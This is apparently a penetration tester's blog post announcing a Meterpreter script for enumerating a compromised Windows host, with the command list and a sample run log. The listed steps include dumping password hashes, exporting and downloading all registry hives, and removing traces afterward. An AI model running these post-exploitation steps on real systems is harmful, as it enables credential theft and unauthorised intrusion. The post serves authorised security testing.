Meterpreter Windows Local Enumeration Script

I recently wrote a small script for local enumeration of a compromised hosts using windows native command line tools from meterpreter so as to comply with many rules of egagements that many companies have of not installing software on their servers. The script will run the following commands:
Executing:

  • set
  • arp -a
  • ipconfig /all
  • ipconfig /displaydns
  • route print
  • net view
  • netstat -na
  • netstat -ns
  • net share
  • net view
  • net group
  • net user
  • net localgroup
  • net view /domain
  • netsh firewall show config
  • wmic computersystem list
  • wmic useraccount list
  • wmic group
  • wmic service list brief
  • wmic volume list brief
  • wmic process list brief
  • wmic startup list full
  • wmic qfe
  • Run meterpreter hashdump
  • export, compress and download all registry hives
and generate a text file with all the output of the commands and compress cabfiles of the exported registry hives, specially useful the last part if done remotely across the Internet. I wrote the script so that new commands can be easily added. The script has to be placed in the scripts/meterpreter/ folder in the root of the metasploit folder so to be able to use it.
you can download it from

/winenum.rb.tar.gz

sample run:

meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on 10.10.10.7:1249...
[*] Executing: set
[*] Executing: arp -a
[*] Executing: ipconfig /all
[*] Executing: ipconfig /displaydns
[*] Executing: route print
[*] Executing: net view
[*] Executing: netstat -na
[*] Executing: netstat -ns
[*] Executing: net share
[*] Executing: net view
[*] Executing: net group
[*] Executing: net user
[*] Executing: net localgroup
[*] Executing: net view /domain
[*] Executing: netsh firewall show config
[*] Executing: wmic computersystem list
[*] Executing: wmic useraccount list
[*] Executing: wmic group
[*] Executing: wmic service list brief
[*] Executing: wmic volume list brief
[*] Executing: wmic process list brief
[*] Executing: wmic startup list full
[*] Executing: wmic qfe
[*] Downloading WDSRB.txt to -> /tmp/10.10.10.7_20081123.390899982
[*] Dumping password hashes...
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCU
[*] Downloading HKLM.cab to -> /tmp/10.10.10.7_20081123.390899982-HKLM
[*] Downloading HKCC.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCC
[*] Downloading HKCR.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCR
[*] Downloading HKU.cab to -> /tmp/10.10.10.7_20081123.390899982-HKU
[*] Removing anything we left behind...
[*] Done!
meterpreter >